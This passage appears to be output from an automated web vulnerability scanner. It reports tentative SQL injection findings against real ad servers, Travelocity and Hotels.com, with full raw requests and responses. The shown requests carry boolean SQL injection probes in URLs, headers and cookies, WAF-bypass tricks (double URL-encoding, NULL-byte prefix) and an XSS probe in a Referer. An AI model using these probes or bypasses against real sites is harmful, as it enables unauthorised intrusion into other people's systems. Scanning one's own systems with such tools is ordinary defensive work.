The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH'%20and%201%3d1--%20;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 427

e9 = new Object();
e9.size = "300x250";
document.write("\n");
document.write("<scr"+"ipt type=\"text/javascript\" src=\"http://tags.expo9.exponential.com/tags/Premierleaguecom/ROS/tags.js\">\n");
document.write("</scr"+"ipt>\n");

var adcount_2816969_1_=new Image();
adcount_2816969_1_.src="http://adserver.adtech.de/adcount|2.0|327|2816969|0|170|AdId=6638640;BnId=2;ct=2204870089;st=783;adcid=1;itime=599386577;reqtype=5;";

Request 2

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH'%20and%201%3d2--%20;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN");
       span.innerHTML = __ADTECH_CODE__;
       window.frameElement.parentNode.appendChild(span);
       __bCodeFlushed = true;
   }
}

if (typeof inFIF != "undefined") {
   document.write = function(str) {
       __ADTECH_CODE__ += str;
   };
   
   document.writeln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816969(i) {
var sVersion_2816969 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"swVersion_ = swControl_.GetVariable(\"$version\")\r\n"+
"end if";
window.execScript(sVersion_2816969, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://www.barclays.co.uk/footballoffset";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=300 height=250";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz170Sq101119310V0Id116/OffsetMortgage_route1_300x250_v7.swf";
var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick
...[SNIP]...
1.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1'
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816969(i) {
var sVersion_2816969 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1''
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1712

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...
1.10. http://adserver.adtech.de/addyn|3.0|999|3106006|0|168|ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|999|3106006|0|168|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn|3.0|999|3106006|0|168|ADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=127;misc=1317599832812&1%2527=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19466

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_3106006(i) {
var sVersion_3106006 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn|3.0|999|3106006|0|168|ADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=127;misc=1317599832812&1%2527%2527=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2131

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
1.11. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176 [NGUserID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Issue detail

The NGUserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the NGUserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484%00'; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response 1

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:33 GMT
Server: Apache
X-Server: prdlmn4008
AdServer: 10.28.75.26:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:33 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 5531
Content-Type: text/html

<META HTTP-EQUIV="Content-type" CONTENT="text/html;charset=ISO-8859-1">
<!-- Sniffer Code for Flash version=100 -->
<SCRIPT LANGUAGE=JavaScript>
<!--
var swf_click = "http://dm.travelocity.com/event.n
...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');
document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.10")))\n');
document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484%00''; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response 2

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:34 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:34 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 794
Content-Type: text/html

<a target="_new" href="/event.ng/Type=click&FlightID=57279&AdID=88855&TargetID=8870&Segments=1,9,3090,5796,5878,9520,10495,11148,12670,20052,20299,20311,22041,22251,22308,22422,22783,22972,22974,23055
...[SNIP]...
1.12. http://www.hotels.com/compare/hotel_dockingbar.html [SSPV cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The SSPV cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the SSPV cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A108.1.0.i2%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:29 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjE5OC4yLjA6MTQ1LjAuMC5pMjoyMDAuMC4wOjEwOC4xLjAuaTI6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi42LjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4xLjAuaTF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:29 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:30 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...
1.13. http://www.hotels.com/compare/hotel_dockingbar.html [SSRT cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The SSRT cookie appears to be vulnerable to SQL injection attacks. The payloads 17075075'%20or%201%3d1--%20 and 17075075'%20or%201%3d2--%20 were each submitted in the SSRT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
